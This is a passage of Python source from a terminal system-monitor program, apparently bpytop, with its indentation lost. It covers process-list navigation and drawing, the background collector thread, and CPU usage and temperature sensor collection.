if cls.selected == cls.select_max and cls.start < ProcCollector.num_procs - cls.select_max + 1:
cls.start += 1
elif cls.selected < cls.select_max:
cls.selected += 1
elif key == "mouse_scroll_up" and cls.start > 1:
cls.start -= 5
elif key == "mouse_scroll_down" and cls.start < ProcCollector.num_procs - cls.select_max + 1:
cls.start += 5
elif key == "page_up" and cls.start > 1:
cls.start -= cls.select_max
elif key == "page_down" and cls.start < ProcCollector.num_procs - cls.select_max + 1:
cls.start += cls.select_max
elif key == "home":
if cls.start > 1: cls.start = 1
elif cls.selected > 0: cls.selected = 0
elif key == "end":
if cls.start < ProcCollector.num_procs - cls.select_max + 1: cls.start = ProcCollector.num_procs - cls.select_max + 1
elif cls.selected < cls.select_max: cls.selected = cls.select_max
elif key == "mouse_click":
if mouse_pos[0] > cls.x + cls.width - 4 and cls.current_y + 1 < mouse_pos[1] < cls.current_y + 1 + cls.select_max + 1:
if mouse_pos[1] == cls.current_y + 2:
cls.start = 1
elif mouse_pos[1] == cls.current_y + 1 + cls.select_max:
cls.start = ProcCollector.num_procs - cls.select_max + 1
else:
cls.start = round((mouse_pos[1] - cls.current_y) * ((ProcCollector.num_procs - cls.select_max - 2) / (cls.select_max - 2)))
else:
new_sel = mouse_pos[1] - cls.current_y - 1 if mouse_pos[1] >= cls.current_y - 1 else 0
if new_sel > 0 and new_sel == cls.selected:
Key.list.insert(0, "enter")
return
elif new_sel > 0 and new_sel != cls.selected:
if cls.last_selection: cls.last_selection = 0
cls.selected = new_sel
elif key == "mouse_unselect":
cls.selected = 0
if cls.start > ProcCollector.num_procs - cls.select_max + 1 and ProcCollector.num_procs > cls.select_max: cls.start = ProcCollector.num_procs - cls.select_max + 1
elif cls.start > ProcCollector.num_procs: cls.start = ProcCollector.num_procs
if cls.start < 1: cls.start = 1
if cls.selected > ProcCollector.num_procs and ProcCollector.num_procs < cls.select_max: cls.selected = ProcCollector.num_procs
elif cls.selected > cls.select_max: cls.selected = cls.select_max
if cls.selected < 0: cls.selected = 0
if old != (cls.start, cls.selected):
cls.moved = True
Collector.collect(ProcCollector, proc_interrupt=True, redraw=True, only_draw=True)
@classmethod
def _draw_fg(cls):
if not "proc" in cls.boxes: return
proc = ProcCollector
if proc.proc_interrupt: return
if proc.redraw: cls.redraw = True
out: str = ""
out_misc: str = ""
n: int = 0
x, y, w, h = cls.x + 1, cls.current_y + 1, cls.width - 2, cls.current_h - 2
prog_len: int; arg_len: int; val: int; c_color: str; m_color: str; t_color: str; sort_pos: int; tree_len: int; is_selected: bool; calc: int
dgx: int; dgw: int; dx: int; dw: int; dy: int
l_count: int = 0
scroll_pos: int = 0
killed: bool = True
indent: str = ""
offset: int = 0
tr_show: bool = True
usr_show: bool = True
vals: List[str]
g_color: str = ""
s_len: int = 0
if proc.search_filter: s_len = len(proc.search_filter[:10])
loc_string: str = f'{cls.start + cls.selected - 1}/{proc.num_procs}'
end: str = ""
if proc.detailed:
dgx, dgw = x, w // 3
dw = w - dgw - 1
if dw > 120:
dw = 120
dgw = w - 121
dx = x + dgw + 2
dy = cls.y + 1
if w > 67:
arg_len = w - 53 - (1 if proc.num_procs > cls.select_max else 0)
prog_len = 15
else:
arg_len = 0
prog_len = w - 38 - (1 if proc.num_procs > cls.select_max else 0)
if prog_len < 15:
tr_show = False
prog_len += 5
if prog_len < 12:
usr_show = False
prog_len += 9
if CONFIG.proc_tree:
tree_len = arg_len + prog_len + 6
arg_len = 0
#* Buttons and titles only redrawn if needed
if cls.resized or cls.redraw:
s_len += len(CONFIG.proc_sorting)
if cls.resized or s_len != cls.s_len or proc.detailed:
cls.s_len = s_len
for k in ["e", "r", "c", "T", "K", "I", "enter", "left", " ", "f", "delete"]:
if k in Key.mouse: del Key.mouse[k]
if proc.detailed:
killed = proc.details.get("killed", False)
main = THEME.main_fg if cls.selected == 0 and not killed else THEME.inactive_fg
hi = THEME.hi_fg if cls.selected == 0 and not killed else THEME.inactive_fg
title = THEME.title if cls.selected == 0 and not killed else THEME.inactive_fg
if cls.current_y != cls.y + 8 or cls.resized or Graphs.detailed_cpu is NotImplemented:
cls.current_y = cls.y + 8
cls.current_h = cls.height - 8
for i in range(7): out_misc += f'{Mv.to(dy+i, x)}{" " * w}'
out_misc += (f'{Mv.to(dy+7, x-1)}{THEME.proc_box}{Symbol.title_right}{Symbol.h_line*w}{Symbol.title_left}'
f'{Mv.to(dy+7, x+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg(SUPERSCRIPT[cls.num])}{THEME.title(cls.name)}{Fx.ub}{THEME.proc_box(Symbol.title_right)}{THEME.div_line}')
for i in range(7):
out_misc += f'{Mv.to(dy + i, dgx + dgw + 1)}{Symbol.v_line}'
out_misc += (f'{Mv.to(dy-1, x-1)}{THEME.proc_box}{Symbol.left_up}{Symbol.h_line*w}{Symbol.right_up}'
f'{Mv.to(dy-1, dgx + dgw + 1)}{Symbol.div_up}'
f'{Mv.to(dy-1, x+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.title(str(proc.details["pid"]))}{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.title(proc.details["name"][:(dgw - 11)])}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if cls.selected == 0:
Key.mouse["enter"] = [[dx+dw-10 + i, dy-1] for i in range(7)]
if cls.selected == 0 and not killed:
Key.mouse["T"] = [[dx+2 + i, dy-1] for i in range(9)]
out_misc += (f'{Mv.to(dy-1, dx+dw - 11)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{title if cls.selected > 0 else THEME.title}close{Fx.ub} {main if cls.selected > 0 else THEME.main_fg}{Symbol.enter}{THEME.proc_box(Symbol.title_right)}'
f'{Mv.to(dy-1, dx+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}T{title}erminate{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if dw > 28:
if cls.selected == 0 and not killed and not "K" in Key.mouse: Key.mouse["K"] = [[dx + 13 + i, dy-1] for i in range(4)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}K{title}ill{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if dw > 39:
if cls.selected == 0 and not killed and not "I" in Key.mouse: Key.mouse["I"] = [[dx + 19 + i, dy-1] for i in range(9)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}I{title}nterrupt{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if Graphs.detailed_cpu is NotImplemented or cls.resized:
Graphs.detailed_cpu = Graph(dgw+1, 7, THEME.gradient["cpu"], proc.details_cpu)
Graphs.detailed_mem = Graph(dw // 3, 1, None, proc.details_mem)
cls.select_max = cls.height - 11
y = cls.y + 9
h = cls.height - 10
else:
if cls.current_y != cls.y or cls.resized:
cls.current_y = cls.y
cls.current_h = cls.height
y, h = cls.y + 1, cls.height - 2
out_misc += (f'{Mv.to(y-1, x-1)}{THEME.proc_box}{Symbol.left_up}{Symbol.h_line*w}{Symbol.right_up}'
f'{Mv.to(y-1, x+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg(SUPERSCRIPT[cls.num])}{THEME.title(cls.name)}{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
f'{Mv.to(y+7, x-1)}{THEME.proc_box(Symbol.v_line)}{Mv.r(w)}{THEME.proc_box(Symbol.v_line)}')
cls.select_max = cls.height - 3
sort_pos = x + w - len(CONFIG.proc_sorting) - 7
if not "left" in Key.mouse:
Key.mouse["left"] = [[sort_pos + i, y-1] for i in range(3)]
Key.mouse["right"] = [[sort_pos + len(CONFIG.proc_sorting) + 3 + i, y-1] for i in range(3)]
out_misc += (f'{Mv.to(y-1, x + 8)}{THEME.proc_box(Symbol.h_line * (w - 9))}' +
("" if not proc.detailed else f"{Mv.to(dy+7, dgx + dgw + 1)}{THEME.proc_box(Symbol.div_down)}") +
f'{Mv.to(y-1, sort_pos)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg("<")} {THEME.title(CONFIG.proc_sorting)} '
f'{THEME.hi_fg(">")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if w > 29 + s_len:
if not "e" in Key.mouse: Key.mouse["e"] = [[sort_pos - 5 + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, sort_pos - 6)}{THEME.proc_box(Symbol.title_left)}{Fx.b if CONFIG.proc_tree else ""}'
f'{THEME.title("tre")}{THEME.hi_fg("e")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if w > 37 + s_len:
if not "r" in Key.mouse: Key.mouse["r"] = [[sort_pos - 14 + i, y-1] for i in range(7)]
out_misc += (f'{Mv.to(y-1, sort_pos - 15)}{THEME.proc_box(Symbol.title_left)}{Fx.b if CONFIG.proc_reversed else ""}'
f'{THEME.hi_fg("r")}{THEME.title("everse")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if w > 47 + s_len:
if not "c" in Key.mouse: Key.mouse["c"] = [[sort_pos - 24 + i, y-1] for i in range(8)]
out_misc += (f'{Mv.to(y-1, sort_pos - 25)}{THEME.proc_box(Symbol.title_left)}{Fx.b if CONFIG.proc_per_core else ""}'
f'{THEME.title("per-")}{THEME.hi_fg("c")}{THEME.title("ore")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if not "f" in Key.mouse or cls.resized: Key.mouse["f"] = [[x+6 + i, y-1] for i in range(6 if not proc.search_filter else 2 + len(proc.search_filter[-10:]))]
if proc.search_filter:
if not "delete" in Key.mouse: Key.mouse["delete"] = [[x+12 + len(proc.search_filter[-10:]) + i, y-1] for i in range(3)]
elif "delete" in Key.mouse:
del Key.mouse["delete"]
out_misc += (f'{Mv.to(y-1, x + 8)}{THEME.proc_box(Symbol.title_left)}{Fx.b if cls.filtering or proc.search_filter else ""}{THEME.hi_fg("F" if cls.filtering and proc.case_sensitive else "f")}{THEME.title}' +
("ilter" if not proc.search_filter and not cls.filtering else f' {proc.search_filter[-(10 if w < 83 else w - 74):]}{(Fx.bl + "█" + Fx.ubl) if cls.filtering else THEME.hi_fg(" del")}') +
f'{THEME.proc_box(Symbol.title_right)}')
main = THEME.inactive_fg if cls.selected == 0 else THEME.main_fg
hi = THEME.inactive_fg if cls.selected == 0 else THEME.hi_fg
title = THEME.inactive_fg if cls.selected == 0 else THEME.title
out_misc += (f'{Mv.to(y+h, x + 1)}{THEME.proc_box}{Symbol.h_line*(w-4)}'
f'{Mv.to(y+h, x+1)}{THEME.proc_box(Symbol.title_left)}{main}{Symbol.up} {Fx.b}{THEME.main_fg("select")} {Fx.ub}'
f'{THEME.inactive_fg if cls.selected == cls.select_max else THEME.main_fg}{Symbol.down}{THEME.proc_box(Symbol.title_right)}'
f'{THEME.proc_box(Symbol.title_left)}{title}{Fx.b}info {Fx.ub}{main}{Symbol.enter}{THEME.proc_box(Symbol.title_right)}')
if not "enter" in Key.mouse: Key.mouse["enter"] = [[x + 14 + i, y+h] for i in range(6)]
if w - len(loc_string) > 34:
if not "T" in Key.mouse: Key.mouse["T"] = [[x + 22 + i, y+h] for i in range(9)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}T{title}erminate{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if w - len(loc_string) > 40:
if not "K" in Key.mouse: Key.mouse["K"] = [[x + 33 + i, y+h] for i in range(4)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}K{title}ill{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if w - len(loc_string) > 51:
if not "I" in Key.mouse: Key.mouse["I"] = [[x + 39 + i, y+h] for i in range(9)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}I{title}nterrupt{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if CONFIG.proc_tree and w - len(loc_string) > 65:
if not " " in Key.mouse: Key.mouse[" "] = [[x + 50 + i, y+h] for i in range(12)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}spc {title}collapse{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
#* Processes labels
selected: str = CONFIG.proc_sorting
label: str
if selected == "memory": selected = "mem"
if selected == "threads" and not CONFIG.proc_tree and not arg_len: selected = "tr"
if CONFIG.proc_tree:
label = (f'{THEME.title}{Fx.b}{Mv.to(y, x)}{" Tree:":<{tree_len-2}}' + (f'{"Threads: ":<9}' if tr_show else " "*4) + (f'{"User:":<9}' if usr_show else "") + f'Mem%{"Cpu%":>11}{Fx.ub}{THEME.main_fg} ' +
(" " if proc.num_procs > cls.select_max else ""))
if selected in ["pid", "program", "arguments"]: selected = "tree"
else:
label = (f'{THEME.title}{Fx.b}{Mv.to(y, x)}{"Pid:":>7} {"Program:" if prog_len > 8 else "Prg:":<{prog_len}}' + (f'{"Arguments:":<{arg_len-4}}' if arg_len else "") +
((f'{"Threads:":<9}' if arg_len else f'{"Tr:":^5}') if tr_show else "") + (f'{"User:":<9}' if usr_show else "") + f'Mem%{"Cpu%":>11}{Fx.ub}{THEME.main_fg} ' +
(" " if proc.num_procs > cls.select_max else ""))
if selected == "program" and prog_len <= 8: selected = "prg"
selected = selected.split(" ")[0].capitalize()
if CONFIG.proc_mem_bytes: label = label.replace("Mem%", "MemB")
label = label.replace(selected, f'{Fx.u}{selected}{Fx.uu}')
out_misc += label
Draw.buffer("proc_misc", out_misc, only_save=True)
#* Detailed box draw
if proc.detailed:
if proc.details["status"] == psutil.STATUS_RUNNING: stat_color = Fx.b
elif proc.details["status"] in [psutil.STATUS_DEAD, psutil.STATUS_STOPPED, psutil.STATUS_ZOMBIE]: stat_color = f'{THEME.inactive_fg}'
else: stat_color = ""
expand = proc.expand
iw = (dw - 3) // (4 + expand)
iw2 = iw - 1
out += (f'{Mv.to(dy, dgx)}{Graphs.detailed_cpu(None if cls.moved or proc.details["killed"] else proc.details_cpu[-1])}'
f'{Mv.to(dy, dgx)}{THEME.title}{Fx.b}{0 if proc.details["killed"] else proc.details["cpu_percent"]}%{Mv.r(1)}{"" if SYSTEM == "MacOS" else (("C" if dgw < 20 else "Core") + str(proc.details["cpu_num"]))}')
for i, l in enumerate(["C", "P", "U"]):
out += f'{Mv.to(dy+2+i, dgx)}{l}'
for i, l in enumerate(["C", "M", "D"]):
out += f'{Mv.to(dy+4+i, dx+1)}{l}'
out += (f'{Mv.to(dy, dx+1)} {"Status:":^{iw}.{iw2}}{"Elapsed:":^{iw}.{iw2}}' +
(f'{"Parent:":^{iw}.{iw2}}' if dw > 28 else "") + (f'{"User:":^{iw}.{iw2}}' if dw > 38 else "") +
(f'{"Threads:":^{iw}.{iw2}}' if expand > 0 else "") + (f'{"Nice:":^{iw}.{iw2}}' if expand > 1 else "") +
(f'{"IO Read:":^{iw}.{iw2}}' if expand > 2 else "") + (f'{"IO Write:":^{iw}.{iw2}}' if expand > 3 else "") +
(f'{"TTY:":^{iw}.{iw2}}' if expand > 4 else "") +
f'{Mv.to(dy+1, dx+1)}{Fx.ub}{THEME.main_fg}{stat_color}{proc.details["status"]:^{iw}.{iw2}}{Fx.ub}{THEME.main_fg}{proc.details["uptime"]:^{iw}.{iw2}} ' +
(f'{proc.details["parent_name"]:^{iw}.{iw2}}' if dw > 28 else "") + (f'{proc.details["username"]:^{iw}.{iw2}}' if dw > 38 else "") +
(f'{proc.details["threads"]:^{iw}.{iw2}}' if expand > 0 else "") + (f'{proc.details["nice"]:^{iw}.{iw2}}' if expand > 1 else "") +
(f'{proc.details["io_read"]:^{iw}.{iw2}}' if expand > 2 else "") + (f'{proc.details["io_write"]:^{iw}.{iw2}}' if expand > 3 else "") +
(f'{proc.details["terminal"][-(iw2):]:^{iw}.{iw2}}' if expand > 4 else "") +
f'{Mv.to(dy+3, dx)}{THEME.title}{Fx.b}{("Memory: " if dw > 42 else "M:") + str(round(proc.details["memory_percent"], 1)) + "%":>{dw//3-1}}{Fx.ub} {THEME.inactive_fg}{"⡀"*(dw//3)}'
f'{Mv.l(dw//3)}{THEME.proc_misc}{Graphs.detailed_mem(None if cls.moved else proc.details_mem[-1])} '
f'{THEME.title}{Fx.b}{proc.details["memory_bytes"]:.{dw//3 - 2}}{THEME.main_fg}{Fx.ub}')
cy = dy + (4 if len(proc.details["cmdline"]) > dw - 5 else 5)
for i in range(ceil(len(proc.details["cmdline"]) / (dw - 5))):
out += f'{Mv.to(cy+i, dx + 3)}{proc.details["cmdline"][((dw-5)*i):][:(dw-5)]:{"^" if i == 0 else "<"}{dw-5}}'
if i == 2: break
#* Checking for selection out of bounds
if cls.start > proc.num_procs - cls.select_max + 1 and proc.num_procs > cls.select_max: cls.start = proc.num_procs - cls.select_max + 1
elif cls.start > proc.num_procs: cls.start = proc.num_procs
if cls.start < 1: cls.start = 1
if cls.selected > proc.num_procs and proc.num_procs < cls.select_max: cls.selected = proc.num_procs
elif cls.selected > cls.select_max: cls.selected = cls.select_max
if cls.selected < 0: cls.selected = 0
#* Start iteration over all processes and info
cy = 1
for n, (pid, items) in enumerate(proc.processes.items(), start=1):
if n < cls.start: continue
l_count += 1
if l_count == cls.selected:
is_selected = True
cls.selected_pid = pid
else: is_selected = False
indent, name, cmd, threads, username, mem, mem_b, cpu = [items.get(v, d) for v, d in [("indent", ""), ("name", ""), ("cmd", ""), ("threads", 0), ("username", "?"), ("mem", 0.0), ("mem_b", 0), ("cpu", 0.0)]]
if CONFIG.proc_tree:
arg_len = 0
offset = tree_len - len(f'{indent}{pid}')
if offset < 1: offset = 0
indent = f'{indent:.{tree_len - len(str(pid))}}'
if offset - len(name) > 12:
cmd = cmd.split(" ")[0].split("/")[-1]
if not cmd.startswith(name):
offset = len(name)
arg_len = tree_len - len(f'{indent}{pid} {name} ') + 2
cmd = f'({cmd[:(arg_len-4)]})'
else:
offset = prog_len - 1
if cpu > 1.0 or pid in Graphs.pid_cpu:
if pid not in Graphs.pid_cpu:
Graphs.pid_cpu[pid] = Graph(5, 1, None, [0])
cls.pid_counter[pid] = 0
elif cpu < 1.0:
cls.pid_counter[pid] += 1
if cls.pid_counter[pid] > 10:
del cls.pid_counter[pid], Graphs.pid_cpu[pid]
else:
cls.pid_counter[pid] = 0
end = f'{THEME.main_fg}{Fx.ub}' if CONFIG.proc_colors else Fx.ub
if cls.selected > cy: calc = cls.selected - cy
elif 0 < cls.selected <= cy: calc = cy - cls.selected
else: calc = cy
if CONFIG.proc_colors and not is_selected:
vals = []
for v in [int(cpu), int(mem), int(threads // 3)]:
if CONFIG.proc_gradient:
val = ((v if v <= 100 else 100) + 100) - calc * 100 // cls.select_max
vals += [f'{THEME.gradient["proc_color" if val < 100 else "process"][val if val < 100 else val - 100]}']
else:
vals += [f'{THEME.gradient["process"][v if v <= 100 else 100]}']
c_color, m_color, t_color = vals
else:
c_color = m_color = t_color = Fx.b
if CONFIG.proc_gradient and not is_selected:
g_color = f'{THEME.gradient["proc"][calc * 100 // cls.select_max]}'
if is_selected:
c_color = m_color = t_color = g_color = end = ""
out += f'{THEME.selected_bg}{THEME.selected_fg}{Fx.b}'
#* Creates one line for a process with all gathered information
out += (f'{Mv.to(y+cy, x)}{g_color}{indent}{pid:>{(1 if CONFIG.proc_tree else 7)}} ' +
f'{c_color}{name:<{offset}.{offset}} {end}' +
(f'{g_color}{cmd:<{arg_len}.{arg_len-1}}' if arg_len else "") +
(t_color + (f'{threads:>4} ' if threads < 1000 else "999> ") + end if tr_show else "") +
(g_color + (f'{username:<9.9}' if len(username) < 10 else f'{username[:8]:<8}+') if usr_show else "") +
m_color + ((f'{mem:>4.1f}' if mem < 100 else f'{mem:>4.0f} ') if not CONFIG.proc_mem_bytes else f'{floating_humanizer(mem_b, short=True):>4.4}') + end +
f' {THEME.inactive_fg}{"⡀"*5}{THEME.main_fg}{g_color}{c_color}' + (f' {cpu:>4.1f} ' if cpu < 100 else f'{cpu:>5.0f} ') + end +
(" " if proc.num_procs > cls.select_max else ""))
#* Draw small cpu graph for process if cpu usage was above 1% in the last 10 updates
if pid in Graphs.pid_cpu:
out += f'{Mv.to(y+cy, x + w - (12 if proc.num_procs > cls.select_max else 11))}{c_color if CONFIG.proc_colors else THEME.proc_misc}{Graphs.pid_cpu[pid](None if cls.moved else round(cpu))}{THEME.main_fg}'
if is_selected: out += f'{Fx.ub}{Term.fg}{Term.bg}{Mv.to(y+cy, x + w - 1)}{" " if proc.num_procs > cls.select_max else ""}'
cy += 1
if cy == h: break
if cy < h:
for i in range(h-cy):
out += f'{Mv.to(y+cy+i, x)}{" " * w}'
#* Draw scrollbar if needed
if proc.num_procs > cls.select_max:
if cls.resized:
Key.mouse["mouse_scroll_up"] = [[x+w-2+i, y] for i in range(3)]
Key.mouse["mouse_scroll_down"] = [[x+w-2+i, y+h-1] for i in range(3)]
scroll_pos = round(cls.start * (cls.select_max - 2) / (proc.num_procs - (cls.select_max - 2)))
if scroll_pos < 0 or cls.start == 1: scroll_pos = 0
elif scroll_pos > h - 3 or cls.start >= proc.num_procs - cls.select_max: scroll_pos = h - 3
out += (f'{Mv.to(y, x+w-1)}{Fx.b}{THEME.main_fg}↑{Mv.to(y+h-1, x+w-1)}↓{Fx.ub}'
f'{Mv.to(y+1+scroll_pos, x+w-1)}█')
elif "scroll_up" in Key.mouse:
del Key.mouse["scroll_up"], Key.mouse["scroll_down"]
#* Draw current selection and number of processes
out += (f'{Mv.to(y+h, x + w - 3 - len(loc_string))}{THEME.proc_box}{Symbol.title_left}{THEME.title}'
f'{Fx.b}{loc_string}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
#* Clean up dead processes graphs and counters
cls.count += 1
if cls.count == 100:
cls.count = 0
for p in list(cls.pid_counter):
if not psutil.pid_exists(p):
del cls.pid_counter[p], Graphs.pid_cpu[p]
Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active)
cls.redraw = cls.resized = cls.moved = False
class Collector:
'''Data collector master class
* .start(): Starts collector thread
* .stop(): Stops collector thread
* .collect(*collectors: Collector, draw_now: bool = True, interrupt: bool = False): queues up collectors to run'''
stopping: bool = False
started: bool = False
draw_now: bool = False
redraw: bool = False
only_draw: bool = False
thread: threading.Thread
collect_run = threading.Event()
collect_idle = threading.Event()
collect_idle.set()
collect_done = threading.Event()
collect_queue: List = []
collect_interrupt: bool = False
proc_interrupt: bool = False
use_draw_list: bool = False
proc_counter: int = 1
@classmethod
def start(cls):
cls.stopping = False
cls.thread = threading.Thread(target=cls._runner, args=())
cls.thread.start()
cls.started = True
@classmethod
def stop(cls):
if cls.started and cls.thread.is_alive():
cls.stopping = True
cls.started = False
cls.collect_queue = []
cls.collect_idle.set()
cls.collect_done.set()
try:
cls.thread.join()
except:
pass
@classmethod
def _runner(cls):
'''This is meant to run in it's own thread, collecting and drawing when collect_run is set'''
draw_buffers: List[str] = []
debugged: bool = False
try:
while not cls.stopping:
if CONFIG.draw_clock and CONFIG.update_ms != 1000: Box.draw_clock()
cls.collect_run.wait(0.1)
if not cls.collect_run.is_set():
continue
draw_buffers = []
cls.collect_interrupt = False
cls.collect_run.clear()
cls.collect_idle.clear()
cls.collect_done.clear()
if DEBUG and not debugged: TimeIt.start("Collect and draw")
while cls.collect_queue:
collector = cls.collect_queue.pop()
if not cls.only_draw:
collector._collect()
collector._draw()
if cls.use_draw_list: draw_buffers.append(collector.buffer)
if cls.collect_interrupt: break
if DEBUG and not debugged: TimeIt.stop("Collect and draw"); debugged = True
if cls.draw_now and not Menu.active and not cls.collect_interrupt:
if cls.use_draw_list: Draw.out(*draw_buffers)
else: Draw.out()
if CONFIG.draw_clock and CONFIG.update_ms == 1000: Box.draw_clock()
cls.collect_idle.set()
cls.collect_done.set()
except Exception as e:
errlog.exception(f'Data collection thread failed with exception: {e}')
cls.collect_idle.set()
cls.collect_done.set()
clean_quit(1, thread=True)
@classmethod
def collect(cls, *collectors, draw_now: bool = True, interrupt: bool = False, proc_interrupt: bool = False, redraw: bool = False, only_draw: bool = False):
'''Setup collect queue for _runner'''
cls.collect_interrupt = interrupt
cls.proc_interrupt = proc_interrupt
cls.collect_idle.wait()
cls.collect_interrupt = False
cls.proc_interrupt = False
cls.use_draw_list = False
cls.draw_now = draw_now
cls.redraw = redraw
cls.only_draw = only_draw
if collectors:
cls.collect_queue = [*collectors]
cls.use_draw_list = True
if ProcCollector in cls.collect_queue:
cls.proc_counter = 1
else:
cls.collect_queue = list(cls.__subclasses__())
if CONFIG.proc_update_mult > 1:
if cls.proc_counter > 1:
cls.collect_queue.remove(ProcCollector)
if cls.proc_counter == CONFIG.proc_update_mult:
cls.proc_counter = 0
cls.proc_counter += 1
cls.collect_run.set()
class CpuCollector(Collector):
'''Collects cpu usage for cpu and cores, cpu frequency, load_avg, uptime and cpu temps'''
cpu_usage: List[List[int]] = []
cpu_upper: List[int] = []
cpu_lower: List[int] = []
cpu_temp: List[List[int]] = []
cpu_temp_high: int = 0
cpu_temp_crit: int = 0
for _ in range(THREADS + 1):
cpu_usage.append([])
cpu_temp.append([])
freq_error: bool = False
cpu_freq: int = 0
load_avg: List[float] = []
uptime: str = ""
buffer: str = CpuBox.buffer
sensor_method: str = ""
got_sensors: bool = False
sensor_swap: bool = False
cpu_temp_only: bool = False
@classmethod
def get_sensors(cls):
'''Check if we can get cpu temps and return method of getting temps'''
cls.sensor_method = ""
if SYSTEM == "MacOS":
try:
if which("coretemp") and subprocess.check_output(["coretemp", "-p"], universal_newlines=True).strip().replace("-", "").isdigit():
cls.sensor_method = "coretemp"
elif which("osx-cpu-temp") and subprocess.check_output("osx-cpu-temp", universal_newlines=True).rstrip().endswith("°C"):
cls.sensor_method = "osx-cpu-temp"
except: pass
elif CONFIG.cpu_sensor != "Auto" and CONFIG.cpu_sensor in CONFIG.cpu_sensors:
cls.sensor_method = "psutil"
elif hasattr(psutil, "sensors_temperatures"):
try:
temps = psutil.sensors_temperatures()
if temps:
for name, entries in temps.items():
if name.lower().startswith("cpu"):
cls.sensor_method = "psutil"
break
for entry in entries:
if entry.label.startswith(("Package", "Core 0", "Tdie", "CPU")):
cls.sensor_method = "psutil"
break
except: pass
if not cls.sensor_method and SYSTEM == "Linux":
try:
if which("vcgencmd") and subprocess.check_output(["vcgencmd", "measure_temp"], universal_newlines=True).strip().endswith("'C"):
cls.sensor_method = "vcgencmd"
except: pass
cls.got_sensors = bool(cls.sensor_method)
@classmethod
def _collect(cls):
cls.cpu_usage[0].append(ceil(psutil.cpu_percent(percpu=False)))
if len(cls.cpu_usage[0]) > Term.width * 4:
del cls.cpu_usage[0][0]
cpu_times_percent = psutil.cpu_times_percent()
for x in ["upper", "lower"]:
if getattr(CONFIG, "cpu_graph_" + x) == "total":
setattr(cls, "cpu_" + x, cls.cpu_usage[0])
else:
getattr(cls, "cpu_" + x).append(ceil(getattr(cpu_times_percent, getattr(CONFIG, "cpu_graph_" + x))))
if len(getattr(cls, "cpu_" + x)) > Term.width * 4:
del getattr(cls, "cpu_" + x)[0]
for n, thread in enumerate(psutil.cpu_percent(percpu=True), start=1):
cls.cpu_usage[n].append(ceil(thread))
if len(cls.cpu_usage[n]) > Term.width * 2:
del cls.cpu_usage[n][0]
try:
if CONFIG.show_cpu_freq and hasattr(psutil.cpu_freq(), "current"):
freq: float = psutil.cpu_freq().current
cls.cpu_freq = round(freq * (1 if freq > 10 else 1000))
elif cls.cpu_freq > 0:
cls.cpu_freq = 0
except Exception as e:
if not cls.freq_error:
cls.freq_error = True
errlog.error("Exception while getting cpu frequency!")
errlog.exception(f'{e}')
else:
pass
cls.load_avg = [round(lavg, 2) for lavg in psutil.getloadavg()]
cls.uptime = str(timedelta(seconds=round(time()-psutil.boot_time(),0)))[:-3].replace(" days,", "d").replace(" day,", "d")
if CONFIG.check_temp and cls.got_sensors:
cls._collect_temps()
@classmethod
def _collect_temps(cls):
temp: int = 1000
cores: List[int] = []
core_dict: Dict[int, int] = {}
entry_int: int = 0
cpu_type: str = ""
c_max: int = 0
s_name: str = "_-_"
s_label: str = "_-_"
if cls.sensor_method == "psutil":
try:
if CONFIG.cpu_sensor != "Auto":
s_name, s_label = CONFIG.cpu_sensor.split(":", 1)
for name, entries in psutil.sensors_temperatures().items():
for num, entry in enumerate(entries, 1):
if name == s_name and (entry.label == s_label or str(num) == s_label):
if entry.label.startswith("Package"):
cpu_type = "intel"
elif entry.label.startswith("Tdie"):
cpu_type = "ryzen"
else:
cpu_type = "other"
if getattr(entry, "high", None) != None and entry.high > 1: cls.cpu_temp_high = round(entry.high)
else: cls.cpu_temp_high = 80
if getattr(entry, "critical", None) != None and entry.critical > 1: cls.cpu_temp_crit = round(entry.critical)
else: cls.cpu_temp_crit = 95
temp = round(entry.current)
elif entry.label.startswith(("Package", "Tdie")) and cpu_type in ["", "other"] and s_name == "_-_" and hasattr(entry, "current"):
if not cls.cpu_temp_high or cls.sensor_swap or cpu_type == "other":
cls.sensor_swap = False
if getattr(entry, "high", None) != None and entry.high > 1: cls.cpu_temp_high = round(entry.high)
else: cls.cpu_temp_high = 80
if getattr(entry, "critical", None) != None and entry.critical > 1: cls.cpu_temp_crit = round(entry.critical)
else: cls.cpu_temp_crit = 95
cpu_type = "intel" if entry.label.startswith("Package") else "ryzen"
temp = round(entry.current)
elif (entry.label.startswith(("Core", "Tccd", "CPU")) or (name.lower().startswith("cpu") and not entry.label)) and hasattr(entry, "current"):
if entry.label.startswith(("Core", "Tccd")):
entry_int = int(entry.label.replace("Core", "").replace("Tccd", ""))
if entry_int in core_dict and cpu_type != "ryzen":
if c_max == 0:
c_max = max(core_dict) + 1
if c_max < THREADS // 2 and (entry_int + c_max) not in core_dict:
core_dict[(entry_int + c_max)] = round(entry.current)
continue
